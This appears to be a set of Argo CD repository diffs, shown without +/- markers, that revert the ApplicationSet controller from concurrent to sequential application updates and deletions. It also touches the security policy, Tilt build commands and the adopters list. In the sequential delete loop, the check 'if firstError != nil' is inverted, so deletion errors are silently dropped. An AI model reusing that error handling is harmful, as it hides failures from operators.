last-reviewed: '2023-10-27'
commit-hash: d91a2ab3bf1b1143fb273fa06f54073fc78f41f1
commit-hash: 814db444c36503851dc3d45cf9c44394821ca1a4
project-url: https://github.com/argoproj/argo-cd
project-release: v3.5.0
project-release: v3.4.0
changelog: https://github.com/argoproj/argo-cd/releases
license: https://github.com/argoproj/argo-cd/blob/master/LICENSE
project-lifecycle:

View File

@@ -80,7 +80,24 @@ We will publish security advisories using the
feature to keep our community well-informed, and will credit you for your
findings (unless you prefer to stay anonymous, of course).
To report a vulnerability to the Argo CD team a draft GitHub security advisory: https://github.com/argoproj/argo-cd/security/advisories/new
There are two ways to report a vulnerability to the Argo CD team:
* By opening a draft GitHub security advisory: https://github.com/argoproj/argo-cd/security/advisories/new
* By e-mail to the following address: cncf-argo-security@lists.cncf.io
## Internet Bug Bounty collaboration
We're happy to announce that the Argo project is collaborating with the great
folks over at
[Hacker One](https://hackerone.com/) and their
[Internet Bug Bounty program](https://hackerone.com/ibb)
to reward the awesome people who find security vulnerabilities in the four
main Argo projects (CD, Events, Rollouts and Workflows) and then work with
us to fix and disclose them in a responsible manner.
If you report a vulnerability to us as outlined in this security policy, we
will work together with you to find out whether your finding is eligible for
claiming a bounty, and also on how to claim it.
## Securing your Argo CD Instance

View File

@@ -257,11 +257,11 @@ k8s_resource(
# ui dependencies
local_resource(
'node-modules',
'pnpm install',
'yarn',
dir='ui',
deps = [
'ui/package.json',
'ui/pnpm-lock.yaml',
'ui/yarn.lock',
],
allow_parallel=True,
)
@@ -271,11 +271,11 @@ docker_build(
'argocd-ui',
context='.',
dockerfile='Dockerfile.ui.tilt',
entrypoint=['sh', '-c', 'cd /app/ui && pnpm start'],
entrypoint=['sh', '-c', 'cd /app/ui && yarn start'],
only=['ui'],
live_update=[
sync('ui', '/app/ui'),
run('sh -c "cd /app/ui && pnpm install"', trigger=['/app/ui/package.json', '/app/ui/pnpm-lock.yaml']),
run('sh -c "cd /app/ui && yarn install"', trigger=['/app/ui/package.json', '/app/ui/yarn.lock']),
],
)

View File

@@ -240,7 +240,6 @@ Currently, the following organizations are **officially** using Argo CD:
1. [Mission Lane](https://missionlane.com)
1. [mixi Group](https://mixi.co.jp/)
1. [Moengage](https://www.moengage.com/)
1. [Mollie](https://www.mollie.com/)
1. [Money Forward](https://corp.moneyforward.com/en/)
1. [MongoDB](https://www.mongodb.com/)
1. [MOO Print](https://www.moo.com/)
@@ -381,7 +380,6 @@ Currently, the following organizations are **officially** using Argo CD:
1. [Tailor Brands](https://www.tailorbrands.com)
1. [Tamkeen Technologies](https://tamkeentech.sa/)
1. [TBC Bank](https://tbcbank.ge/)
1. [Techcom Securities](https://www.tcbs.com.vn/)
1. [Techcombank](https://www.techcombank.com.vn/trang-chu)
1. [Technacy](https://www.technacy.it/)
1. [Telavita](https://www.telavita.com.br/)

View File

@@ -1 +1 @@
3.5.0
3.4.0-rc4

View File

@@ -24,13 +24,11 @@ import (
"sort"
"strconv"
"strings"
"sync"
"time"
"github.com/google/go-cmp/cmp"
"github.com/google/go-cmp/cmp/cmpopts"
log "github.com/sirupsen/logrus"
"golang.org/x/sync/errgroup"
corev1 "k8s.io/api/core/v1"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
@@ -108,16 +106,15 @@ type ApplicationSetReconciler struct {
Policy argov1alpha1.ApplicationsSyncPolicy
EnablePolicyOverride bool
utils.Renderer
ArgoCDNamespace string
ApplicationSetNamespaces []string
EnableProgressiveSyncs bool
SCMRootCAPath string
GlobalPreservedAnnotations []string
GlobalPreservedLabels []string
Metrics *metrics.ApplicationsetMetrics
MaxResourcesStatusCount int
ClusterInformer *settings.ClusterInformer
ConcurrentApplicationUpdates int
ArgoCDNamespace string
ApplicationSetNamespaces []string
EnableProgressiveSyncs bool
SCMRootCAPath string
GlobalPreservedAnnotations []string
GlobalPreservedLabels []string
Metrics *metrics.ApplicationsetMetrics
MaxResourcesStatusCount int
ClusterInformer *settings.ClusterInformer
}
// +kubebuilder:rbac:groups=argoproj.io,resources=applicationsets,verbs=get;list;watch;create;update;patch;delete
@@ -694,133 +691,108 @@ func (r *ApplicationSetReconciler) SetupWithManager(mgr ctrl.Manager, enableProg
// - For existing application, it will call update
// The function also adds owner reference to all applications, and uses it to delete them.
func (r *ApplicationSetReconciler) createOrUpdateInCluster(ctx context.Context, logCtx *log.Entry, applicationSet argov1alpha1.ApplicationSet, desiredApplications []argov1alpha1.Application) error {
// Build the diff config once per reconcile.
// Diff config is per applicationset, so generate it once for all applications
diffConfig, err := utils.BuildIgnoreDiffConfig(applicationSet.Spec.IgnoreApplicationDifferences, normalizers.IgnoreNormalizerOpts{})
if err != nil {
return fmt.Errorf("failed to build ignore diff config: %w", err)
}
g, ctx := errgroup.WithContext(ctx)
concurrency := r.concurrency()
g.SetLimit(concurrency)
var appErrorsMu sync.Mutex
appErrors := map[string]error{}
var firstError error
// Creates or updates the application in appList
for _, generatedApp := range desiredApplications {
appLog := logCtx.WithFields(applog.GetAppLogFields(&generatedApp))
// Normalize to avoid fighting with the application controller.
generatedApp.Spec = *argoutil.NormalizeApplicationSpec(&generatedApp.Spec)
g.Go(func() error {
appLog := logCtx.WithFields(applog.GetAppLogFields(&generatedApp))
found := &argov1alpha1.Application{
ObjectMeta: metav1.ObjectMeta{
Name: generatedApp.Name,
Namespace: generatedApp.Namespace,
},
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
found := &argov1alpha1.Application{
ObjectMeta: metav1.ObjectMeta{
Name: generatedApp.Name,
Namespace: generatedApp.Namespace,
},
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
}
action, err := utils.CreateOrUpdate(ctx, appLog, r.Client, applicationSet.Spec.IgnoreApplicationDifferences, normalizers.IgnoreNormalizerOpts{}, found, func() error {
// Copy only the Application/ObjectMeta fields that are significant, from the generatedApp
found.Spec = generatedApp.Spec
// allow setting the Operation field to trigger a sync operation on an Application
if generatedApp.Operation != nil {
found.Operation = generatedApp.Operation
}
action, err := utils.CreateOrUpdate(ctx, appLog, r.Client, diffConfig, found, func() error {
// Copy only the Application/ObjectMeta fields that are significant, from the generatedApp
found.Spec = generatedApp.Spec
preservedAnnotations := make([]string, 0)
preservedLabels := make([]string, 0)
// allow setting the Operation field to trigger a sync operation on an Application
if generatedApp.Operation != nil {
found.Operation = generatedApp.Operation
}
preservedAnnotations := make([]string, 0)
preservedLabels := make([]string, 0)
if applicationSet.Spec.PreservedFields != nil {
preservedAnnotations = append(preservedAnnotations, applicationSet.Spec.PreservedFields.Annotations...)
preservedLabels = append(preservedLabels, applicationSet.Spec.PreservedFields.Labels...)
}
if len(r.GlobalPreservedAnnotations) > 0 {
preservedAnnotations = append(preservedAnnotations, r.GlobalPreservedAnnotations...)
}
if len(r.GlobalPreservedLabels) > 0 {
preservedLabels = append(preservedLabels, r.GlobalPreservedLabels...)
}
// Preserve specially treated argo cd annotations:
// * https://github.com/argoproj/applicationset/issues/180
// * https://github.com/argoproj/argo-cd/issues/10500
preservedAnnotations = append(preservedAnnotations, defaultPreservedAnnotations...)
for _, key := range preservedAnnotations {
if state, exists := found.Annotations[key]; exists {
if generatedApp.Annotations == nil {
generatedApp.Annotations = map[string]string{}
}
generatedApp.Annotations[key] = state
}
}
for _, key := range preservedLabels {
if state, exists := found.Labels[key]; exists {
if generatedApp.Labels == nil {
generatedApp.Labels = map[string]string{}
}
generatedApp.Labels[key] = state
}
}
// Preserve deleting finalizers and avoid diff conflicts
for _, finalizer := range defaultPreservedFinalizers {
for _, f := range found.Finalizers {
// For finalizers, use prefix matching in case it contains "/" stages
if strings.HasPrefix(f, finalizer) {
generatedApp.Finalizers = append(generatedApp.Finalizers, f)
}
}
}
found.Annotations = generatedApp.Annotations
found.Labels = generatedApp.Labels
found.Finalizers = generatedApp.Finalizers
return controllerutil.SetControllerReference(&applicationSet, found, r.Scheme)
})
if err != nil {
appLog.WithError(err).WithField("action", action).Errorf("failed to %s Application", action)
// If the context was canceled or its deadline exceeded, return the error so it propagates through g.Wait().
if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
return err
}
// For backwards compatibility with sequential behavior: continue processing other applications
// but record the error keyed by app name so we can deterministically return the error from
// the lexicographically first failing app, regardless of goroutine scheduling order.
appErrorsMu.Lock()
appErrors[generatedApp.Name] = err
appErrorsMu.Unlock()
return nil
if applicationSet.Spec.PreservedFields != nil {
preservedAnnotations = append(preservedAnnotations, applicationSet.Spec.PreservedFields.Annotations...)
preservedLabels = append(preservedLabels, applicationSet.Spec.PreservedFields.Labels...)
}
if action != controllerutil.OperationResultNone {
// Don't pollute etcd with "unchanged Application" events
r.Recorder.Eventf(&applicationSet, corev1.EventTypeNormal, fmt.Sprint(action), "%s Application %q", action, generatedApp.Name)
appLog.Logf(log.InfoLevel, "%s Application", action)
} else {
// "unchanged Application" can be inferred by Reconcile Complete with no action being listed
// Or enable debug logging
appLog.Logf(log.DebugLevel, "%s Application", action)
if len(r.GlobalPreservedAnnotations) > 0 {
preservedAnnotations = append(preservedAnnotations, r.GlobalPreservedAnnotations...)
}
return nil
if len(r.GlobalPreservedLabels) > 0 {
preservedLabels = append(preservedLabels, r.GlobalPreservedLabels...)
}
// Preserve specially treated argo cd annotations:
// * https://github.com/argoproj/applicationset/issues/180
// * https://github.com/argoproj/argo-cd/issues/10500
preservedAnnotations = append(preservedAnnotations, defaultPreservedAnnotations...)
for _, key := range preservedAnnotations {
if state, exists := found.Annotations[key]; exists {
if generatedApp.Annotations == nil {
generatedApp.Annotations = map[string]string{}
}
generatedApp.Annotations[key] = state
}
}
for _, key := range preservedLabels {
if state, exists := found.Labels[key]; exists {
if generatedApp.Labels == nil {
generatedApp.Labels = map[string]string{}
}
generatedApp.Labels[key] = state
}
}
// Preserve deleting finalizers and avoid diff conflicts
for _, finalizer := range defaultPreservedFinalizers {
for _, f := range found.Finalizers {
// For finalizers, use prefix matching in case it contains "/" stages
if strings.HasPrefix(f, finalizer) {
generatedApp.Finalizers = append(generatedApp.Finalizers, f)
}
}
}
found.Annotations = generatedApp.Annotations
found.Labels = generatedApp.Labels
found.Finalizers = generatedApp.Finalizers
return controllerutil.SetControllerReference(&applicationSet, found, r.Scheme)
})
}
if err != nil {
appLog.WithError(err).WithField("action", action).Errorf("failed to %s Application", action)
if firstError == nil {
firstError = err
}
continue
}
if err := g.Wait(); errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
return err
if action != controllerutil.OperationResultNone {
// Don't pollute etcd with "unchanged Application" events
r.Recorder.Eventf(&applicationSet, corev1.EventTypeNormal, fmt.Sprint(action), "%s Application %q", action, generatedApp.Name)
appLog.Logf(log.InfoLevel, "%s Application", action)
} else {
// "unchanged Application" can be inferred by Reconcile Complete with no action being listed
// Or enable debug logging
appLog.Logf(log.DebugLevel, "%s Application", action)
}
}
return firstAppError(appErrors)
return firstError
}
// createInCluster will filter from the desiredApplications only the application that needs to be created
@@ -880,84 +852,36 @@ func (r *ApplicationSetReconciler) deleteInCluster(ctx context.Context, logCtx *
m[app.Name] = true
}
g, ctx := errgroup.WithContext(ctx)
concurrency := r.concurrency()
g.SetLimit(concurrency)
var appErrorsMu sync.Mutex
appErrors := map[string]error{}
// Delete apps that are not in m[string]bool
var firstError error
for _, app := range current {
logCtx = logCtx.WithFields(applog.GetAppLogFields(&app))
_, exists := m[app.Name]
if exists {
continue
}
appLogCtx := logCtx.WithFields(applog.GetAppLogFields(&app))
g.Go(func() error {
if !exists {
// Removes the Argo CD resources finalizer if the application contains an invalid target (eg missing cluster)
err := r.removeFinalizerOnInvalidDestination(ctx, applicationSet, &app, clusterList, appLogCtx)
err := r.removeFinalizerOnInvalidDestination(ctx, applicationSet, &app, clusterList, logCtx)
if err != nil {
appLogCtx.WithError(err).Error("failed to update Application")
// If the context was canceled or its deadline exceeded, return the error so it propagates through g.Wait().
if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
return err
logCtx.WithError(err).Error("failed to update Application")
if firstError != nil {
firstError = err
}
// For backwards compatibility with sequential behavior: continue processing other applications
// but record the error keyed by app name so we can deterministically return the error from
// the lexicographically first failing app, regardless of goroutine scheduling order.
appErrorsMu.Lock()
appErrors[app.Name] = err
appErrorsMu.Unlock()
return nil
continue
}
err = r.Delete(ctx, &app)
if err != nil {
appLogCtx.WithError(err).Error("failed to delete Application")
// If the context was canceled or its deadline exceeded, return the error so it propagates through g.Wait().
if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
return err
logCtx.WithError(err).Error("failed to delete Application")
if firstError != nil {
firstError = err
}
appErrorsMu.Lock()
appErrors[app.Name] = err
appErrorsMu.Unlock()
return nil
continue
}
r.Recorder.Eventf(&applicationSet, corev1.EventTypeNormal, "Deleted", "Deleted Application %q", app.Name)
appLogCtx.Log(log.InfoLevel, "Deleted application")
return nil
})
logCtx.Log(log.InfoLevel, "Deleted application")
}
}
if err := g.Wait(); errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
return err
}
return firstAppError(appErrors)
}
// concurrency returns the configured number of concurrent application updates, defaulting to 1.
func (r *ApplicationSetReconciler) concurrency() int {
if r.ConcurrentApplicationUpdates <= 0 {
return 1
}
return r.ConcurrentApplicationUpdates
}
// firstAppError returns the error associated with the lexicographically smallest application name
// in the provided map. This gives a deterministic result when multiple goroutines may have
// recorded errors concurrently, matching the behavior of the original sequential loop where the
// first application in iteration order would determine the returned error.
func firstAppError(appErrors map[string]error) error {
if len(appErrors) == 0 {
return nil
}
names := make([]string, 0, len(appErrors))
for name := range appErrors {
names = append(names, name)
}
sort.Strings(names)
return appErrors[names[0]]
return firstError
}
// removeFinalizerOnInvalidDestination removes the Argo CD resources finalizer if the application contains an invalid target (eg missing cluster)

View File

@@ -25,7 +25,6 @@ import (
ctrl "sigs.k8s.io/controller-runtime"
crtclient "sigs.k8s.io/controller-runtime/pkg/client"
"sigs.k8s.io/controller-runtime/pkg/client/fake"
"sigs.k8s.io/controller-runtime/pkg/client/interceptor"
"sigs.k8s.io/controller-runtime/pkg/controller/controllerutil"
"sigs.k8s.io/controller-runtime/pkg/event"
@@ -1078,70 +1077,6 @@ func TestCreateOrUpdateInCluster(t *testing.T) {
},
},
},
{
name: "Ensure that unnormalized live spec does not cause a spurious patch",
appSet: v1alpha1.ApplicationSet{
ObjectMeta: metav1.ObjectMeta{
Name: "name",
Namespace: "namespace",
},
Spec: v1alpha1.ApplicationSetSpec{
Template: v1alpha1.ApplicationSetTemplate{
Spec: v1alpha1.ApplicationSpec{
Project: "project",
},
},
},
},
existingApps: []v1alpha1.Application{
{
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
ObjectMeta: metav1.ObjectMeta{
Name: "app1",
Namespace: "namespace",
ResourceVersion: "2",
},
Spec: v1alpha1.ApplicationSpec{
Project: "project",
// Without normalizing the live object, the equality check
// sees &SyncPolicy{} vs nil and issues an unnecessary patch.
SyncPolicy: &v1alpha1.SyncPolicy{},
},
},
},
desiredApps: []v1alpha1.Application{
{
ObjectMeta: metav1.ObjectMeta{
Name: "app1",
Namespace: "namespace",
},
Spec: v1alpha1.ApplicationSpec{
Project: "project",
SyncPolicy: nil,
},
},
},
expected: []v1alpha1.Application{
{
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
ObjectMeta: metav1.ObjectMeta{
Name: "app1",
Namespace: "namespace",
ResourceVersion: "2",
},
Spec: v1alpha1.ApplicationSpec{
Project: "project",
SyncPolicy: &v1alpha1.SyncPolicy{},
},
},
},
},
{
name: "Ensure that argocd pre-delete and post-delete finalizers are preserved from an existing app",
appSet: v1alpha1.ApplicationSet{
@@ -1251,374 +1186,6 @@ func TestCreateOrUpdateInCluster(t *testing.T) {
}
}
func TestCreateOrUpdateInCluster_Concurrent(t *testing.T) {
scheme := runtime.NewScheme()
err := v1alpha1.AddToScheme(scheme)
require.NoError(t, err)
appSet := v1alpha1.ApplicationSet{
ObjectMeta: metav1.ObjectMeta{
Name: "name",
Namespace: "namespace",
},
}
t.Run("all apps are created correctly with concurrency > 1", func(t *testing.T) {
desiredApps := make([]v1alpha1.Application, 5)
for i := range desiredApps {
desiredApps[i] = v1alpha1.Application{
ObjectMeta: metav1.ObjectMeta{
Name: fmt.Sprintf("app%d", i),
Namespace: "namespace",
},
Spec: v1alpha1.ApplicationSpec{Project: "project"},
}
}
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(&appSet).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
Build()
metrics := appsetmetrics.NewFakeAppsetMetrics()
r := ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
Metrics: metrics,
ConcurrentApplicationUpdates: 5,
}
err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, desiredApps)
require.NoError(t, err)
for _, desired := range desiredApps {
got := &v1alpha1.Application{}
require.NoError(t, fakeClient.Get(t.Context(), crtclient.ObjectKey{Namespace: desired.Namespace, Name: desired.Name}, got))
assert.Equal(t, desired.Spec.Project, got.Spec.Project)
}
})
t.Run("non-context errors from concurrent goroutines are collected and one is returned", func(t *testing.T) {
existingApps := make([]v1alpha1.Application, 5)
initObjs := []crtclient.Object{&appSet}
for i := range existingApps {
existingApps[i] = v1alpha1.Application{
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
ObjectMeta: metav1.ObjectMeta{
Name: fmt.Sprintf("app%d", i),
Namespace: "namespace",
ResourceVersion: "1",
},
Spec: v1alpha1.ApplicationSpec{Project: "old"},
}
app := existingApps[i].DeepCopy()
require.NoError(t, controllerutil.SetControllerReference(&appSet, app, scheme))
initObjs = append(initObjs, app)
}
desiredApps := make([]v1alpha1.Application, 5)
for i := range desiredApps {
desiredApps[i] = v1alpha1.Application{
ObjectMeta: metav1.ObjectMeta{
Name: fmt.Sprintf("app%d", i),
Namespace: "namespace",
},
Spec: v1alpha1.ApplicationSpec{Project: "new"},
}
}
patchErr := errors.New("some patch error")
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(initObjs...).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Patch: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ crtclient.Patch, _ ...crtclient.PatchOption) error {
return patchErr
},
}).
Build()
metrics := appsetmetrics.NewFakeAppsetMetrics()
r := ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
Metrics: metrics,
ConcurrentApplicationUpdates: 5,
}
err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, desiredApps)
require.ErrorIs(t, err, patchErr)
})
}
func TestCreateOrUpdateInCluster_ContextCancellation(t *testing.T) {
scheme := runtime.NewScheme()
err := v1alpha1.AddToScheme(scheme)
require.NoError(t, err)
appSet := v1alpha1.ApplicationSet{
ObjectMeta: metav1.ObjectMeta{
Name: "name",
Namespace: "namespace",
},
}
existingApp := v1alpha1.Application{
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
ObjectMeta: metav1.ObjectMeta{
Name: "app1",
Namespace: "namespace",
ResourceVersion: "1",
},
Spec: v1alpha1.ApplicationSpec{Project: "old"},
}
desiredApp := v1alpha1.Application{
ObjectMeta: metav1.ObjectMeta{
Name: "app1",
Namespace: "namespace",
},
Spec: v1alpha1.ApplicationSpec{Project: "new"},
}
t.Run("context canceled on patch is returned directly", func(t *testing.T) {
initObjs := []crtclient.Object{&appSet}
app := existingApp.DeepCopy()
err = controllerutil.SetControllerReference(&appSet, app, scheme)
require.NoError(t, err)
initObjs = append(initObjs, app)
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(initObjs...).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Patch: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ crtclient.Patch, _ ...crtclient.PatchOption) error {
return context.Canceled
},
}).
Build()
metrics := appsetmetrics.NewFakeAppsetMetrics()
r := ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
Metrics: metrics,
}
err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{desiredApp})
require.ErrorIs(t, err, context.Canceled)
})
t.Run("context deadline exceeded on patch is returned directly", func(t *testing.T) {
initObjs := []crtclient.Object{&appSet}
app := existingApp.DeepCopy()
err = controllerutil.SetControllerReference(&appSet, app, scheme)
require.NoError(t, err)
initObjs = append(initObjs, app)
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(initObjs...).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Patch: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ crtclient.Patch, _ ...crtclient.PatchOption) error {
return context.DeadlineExceeded
},
}).
Build()
metrics := appsetmetrics.NewFakeAppsetMetrics()
r := ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
Metrics: metrics,
}
err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{desiredApp})
require.ErrorIs(t, err, context.DeadlineExceeded)
})
t.Run("non-context error is collected and returned after all goroutines finish", func(t *testing.T) {
initObjs := []crtclient.Object{&appSet}
app := existingApp.DeepCopy()
err = controllerutil.SetControllerReference(&appSet, app, scheme)
require.NoError(t, err)
initObjs = append(initObjs, app)
patchErr := errors.New("some patch error")
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(initObjs...).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Patch: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ crtclient.Patch, _ ...crtclient.PatchOption) error {
return patchErr
},
}).
Build()
metrics := appsetmetrics.NewFakeAppsetMetrics()
r := ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
Metrics: metrics,
}
err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{desiredApp})
require.ErrorIs(t, err, patchErr)
})
t.Run("context canceled on create is returned directly", func(t *testing.T) {
initObjs := []crtclient.Object{&appSet}
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(initObjs...).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Create: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ ...crtclient.CreateOption) error {
return context.Canceled
},
}).
Build()
metrics := appsetmetrics.NewFakeAppsetMetrics()
r := ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
Metrics: metrics,
}
newApp := v1alpha1.Application{
ObjectMeta: metav1.ObjectMeta{Name: "newapp", Namespace: "namespace"},
Spec: v1alpha1.ApplicationSpec{Project: "default"},
}
err = r.createOrUpdateInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{newApp})
require.ErrorIs(t, err, context.Canceled)
})
}
func TestDeleteInCluster_ContextCancellation(t *testing.T) {
scheme := runtime.NewScheme()
err := v1alpha1.AddToScheme(scheme)
require.NoError(t, err)
err = corev1.AddToScheme(scheme)
require.NoError(t, err)
appSet := v1alpha1.ApplicationSet{
ObjectMeta: metav1.ObjectMeta{
Name: "name",
Namespace: "namespace",
},
}
existingApp := v1alpha1.Application{
TypeMeta: metav1.TypeMeta{
Kind: application.ApplicationKind,
APIVersion: "argoproj.io/v1alpha1",
},
ObjectMeta: metav1.ObjectMeta{
Name: "delete-me",
Namespace: "namespace",
ResourceVersion: "1",
},
Spec: v1alpha1.ApplicationSpec{Project: "project"},
}
makeReconciler := func(t *testing.T, fakeClient crtclient.Client) ApplicationSetReconciler {
t.Helper()
kubeclientset := kubefake.NewClientset()
clusterInformer, err := settings.NewClusterInformer(kubeclientset, "namespace")
require.NoError(t, err)
cancel := startAndSyncInformer(t, clusterInformer)
t.Cleanup(cancel)
return ApplicationSetReconciler{
Client: fakeClient,
Scheme: scheme,
Recorder: record.NewFakeRecorder(10),
KubeClientset: kubeclientset,
Metrics: appsetmetrics.NewFakeAppsetMetrics(),
ClusterInformer: clusterInformer,
}
}
t.Run("context canceled on delete is returned directly", func(t *testing.T) {
app := existingApp.DeepCopy()
err = controllerutil.SetControllerReference(&appSet, app, scheme)
require.NoError(t, err)
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(&appSet, app).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Delete: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ ...crtclient.DeleteOption) error {
return context.Canceled
},
}).
Build()
r := makeReconciler(t, fakeClient)
err = r.deleteInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{})
require.ErrorIs(t, err, context.Canceled)
})
t.Run("context deadline exceeded on delete is returned directly", func(t *testing.T) {
app := existingApp.DeepCopy()
err = controllerutil.SetControllerReference(&appSet, app, scheme)
require.NoError(t, err)
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(&appSet, app).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Delete: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ ...crtclient.DeleteOption) error {
return context.DeadlineExceeded
},
}).
Build()
r := makeReconciler(t, fakeClient)
err = r.deleteInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{})
require.ErrorIs(t, err, context.DeadlineExceeded)
})
t.Run("non-context delete error is collected and returned", func(t *testing.T) {
app := existingApp.DeepCopy()
err = controllerutil.SetControllerReference(&appSet, app, scheme)
require.NoError(t, err)
deleteErr := errors.New("delete failed")
fakeClient := fake.NewClientBuilder().
WithScheme(scheme).
WithObjects(&appSet, app).
WithIndex(&v1alpha1.Application{}, ".metadata.controller", appControllerIndexer).
WithInterceptorFuncs(interceptor.Funcs{
Delete: func(_ context.Context, _ crtclient.WithWatch, _ crtclient.Object, _ ...crtclient.DeleteOption) error {
return deleteErr
},
}).
Build()
r := makeReconciler(t, fakeClient)
err = r.deleteInCluster(t.Context(), log.NewEntry(log.StandardLogger()), appSet, []v1alpha1.Application{})
require.ErrorIs(t, err, deleteErr)
})
}
func TestRemoveFinalizerOnInvalidDestination_FinalizerTypes(t *testing.T) {
scheme := runtime.NewScheme()
err := v1alpha1.AddToScheme(scheme)
@@ -7950,40 +7517,6 @@ func TestIsRollingSyncStrategy(t *testing.T) {
}
}
func TestFirstAppError(t *testing.T) {
errA := errors.New("error from app-a")
errB := errors.New("error from app-b")
errC := errors.New("error from app-c")
t.Run("returns nil for empty map", func(t *testing.T) {
assert.NoError(t, firstAppError(map[string]error{}))
})
t.Run("returns the single error", func(t *testing.T) {
assert.ErrorIs(t, firstAppError(map[string]error{"app-a": errA}), errA)
})
t.Run("returns error from lexicographically first app name", func(t *testing.T) {
appErrors := map[string]error{
"app-c": errC,
"app-a": errA,
"app-b": errB,
}
assert.ErrorIs(t, firstAppError(appErrors), errA)
})
t.Run("result is stable across multiple calls with same input", func(t *testing.T) {
appErrors := map[string]error{
"app-c": errC,
"app-a": errA,
"app-b": errB,
}
for range 10 {
assert.ErrorIs(t, firstAppError(appErrors), errA, "firstAppError must return the same error on every call")
}
})
}
func TestSyncApplication(t *testing.T) {
tests := []struct {
name string

View File

@@ -24,43 +24,6 @@ import (
"github.com/argoproj/argo-cd/v3/util/argo/normalizers"
)
var appEquality = conversion.EqualitiesOrDie(
func(a, b resource.Quantity) bool {
// Ignore formatting, only care that numeric value stayed the same.
// TODO: if we decide it's important, it should be safe to start comparing the format.
//
// Uninitialized quantities are equivalent to 0 quantities.
return a.Cmp(b) == 0
},
func(a, b metav1.MicroTime) bool {
return a.UTC().Equal(b.UTC())
},
func(a, b metav1.Time) bool {
return a.UTC().Equal(b.UTC())
},
func(a, b labels.Selector) bool {
return a.String() == b.String()
},
func(a, b fields.Selector) bool {
return a.String() == b.String()
},
func(a, b argov1alpha1.ApplicationDestination) bool {
return a.Namespace == b.Namespace && a.Name == b.Name && a.Server == b.Server
},
)
// BuildIgnoreDiffConfig constructs a DiffConfig from the ApplicationSet's ignoreDifferences rules.
// Returns nil when ignoreDifferences is empty.
func BuildIgnoreDiffConfig(ignoreDifferences argov1alpha1.ApplicationSetIgnoreDifferences, ignoreNormalizerOpts normalizers.IgnoreNormalizerOpts) (argodiff.DiffConfig, error) {
if len(ignoreDifferences) == 0 {
return nil, nil
}
return argodiff.NewDiffConfigBuilder().
WithDiffSettings(ignoreDifferences.ToApplicationIgnoreDifferences(), nil, false, ignoreNormalizerOpts).
WithNoCache().
Build()
}
// CreateOrUpdate overrides "sigs.k8s.io/controller-runtime" function
// in sigs.k8s.io/controller-runtime/pkg/controller/controllerutil/controllerutil.go
